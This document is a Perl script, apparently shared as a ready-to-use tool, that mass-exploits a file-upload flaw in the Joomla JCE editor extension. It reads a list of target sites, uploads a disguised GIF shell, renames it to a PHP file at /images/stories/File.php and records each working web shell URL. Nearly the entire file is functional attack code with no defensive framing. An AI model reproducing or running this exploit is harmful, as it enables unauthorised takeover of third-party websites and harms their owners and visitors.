Multi JCE Exploiter

1. #--------------------------------------#
2. # Multi JCE Exploiter                  #
3. #--------------------------------------#
4. # C0ded By : Medrik                    #
5. #--------------------------------------#
6. # SecTime.Ir  ,  GHBSec.blogspot.com   #
7. #--------------------------------------#
8. #  Special Thanks To : Mr.0x41         #
9. #--------------------------------------#
10.  
11. #----------------------------
12. # Download GIF File If You Dont have that : http://setfa.net/images/ajakqsvigixdi7d24y47.gif
13. # Change This GIF File Name To Medrik.gif And Insert Beside This Perl File .
14. #----------------------------
15.  
16. if ($^O eq 'MSWin32'){system 'cls';}else {system 'clear';}
17. if (!$ARGV[0]){
18. banner();
19. print q(
20.  
21.         # usage :    perl JCE.pl YourList.txt
22.  
23. );
24. sleep (10);
25. exit;
26. }
27.  
28. &banner;
29.  
30. sub banner{
31. print "
32.  
33.    ,--^----------,--------,-----,-------^--,
34.  | |||||||||   `--------'     |          O  
35.  `+---------------------------^----------|
36.    `\_,-------, _________________________|    
37.      / XXXXXX /`|     /                    
38.     / XXXXXX /  `\  /       Multi JCE Exploiter              
39.    / XXXXXX /\______(                      
40.   / XXXXXX /                      Coded By Medrik
41.  / XXXXXX /
42. (________(                            ./2014 , Grey Hat Boys
43.        
44.        
45.        
46.        
47. ";
48. }
49.  
50. use LWP;
51. use IO::Socket::INET;
52. $myuseragent = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801';
53. $ua = LWP::UserAgent->new();
54. $ua->agent($myuseragent);
55. $ua->timeout(15);
56. print "\n";
57. open (TARGETS , $ARGV[0]) or die "\n Couldn't Open ".$ARGV[0]."\n\n";
58. my @file = <TARGETS>;
59. target: foreach (@file){ chomp(my $target = $_);
60. $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
61. $site = "http://".$target if ($target !~ /http:\/\//);
62. $vulnurl=$site.$exploiturl;
63. $res = $ua->get($vulnurl)->content;
64. if ($res =~ m/No function call specified!/i){
65. my $res = $ua->post($vulnurl,
66.     Content_Type => 'form-data',
67.     Content => [
68.     'upload-overwrite' => 0,
69.     'Filedata' => ["Shell.gif"],
70.     'action' => 'upload'
71.     ]
72.     )->decoded_content;
73. if ($res =~ m/"error":false/i){
74. #---
75. }else{
76. print " [-] $site -> Target Patched ! \n";
77. }
78. }
79. $remote = IO::Socket::INET->new(
80.     Proto=>'tcp',
81.     PeerAddr=>"$target",
82.     PeerPort=>80,
83.     Timeout=>15
84.     ) or print " Error For : $site" and next target;
85. $json = 'json={"fn":"folderRename","args":["/Shell.gif","File.php"]}';
86. print $remote "POST $exploiturl HTTP/1.1"."\n";
87. print $remote "Host: $target"."\n";
88. print $remote "User-Agent: $myuseragent"."\n";
89. print $remote 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'."\n";
90. print $remote 'X-Request: JSON'."\n";
91. print $remote "Content-Length: ".length($json).""."\n\n";
92. print $remote "$json"."\n\n";
93. $addressShell = "$site/images/stories/File.php";
94. $shelltarget = $ua->get($addressShell)->content;
95. if ($shelltarget =~ /your file to upload/){
96. print "\n [+] $addressShell \n\n";
97. open (Sh3llz , ">Shell.txt");
98. print Sh3llz "$addressShell\n";
99. }
100. }
101. print "\n\n [*] Finished ! \n\n";
102. sleep (3);
103. #
104. # hahahahhahahah End .>>>>>>> Hahahah !
105. #
106. # Special Tnx To Iranian Hackers And Programmers :)
107. #
108. # ./2014 , Grey Hat Boys
109.  
110. #--------------------------------------#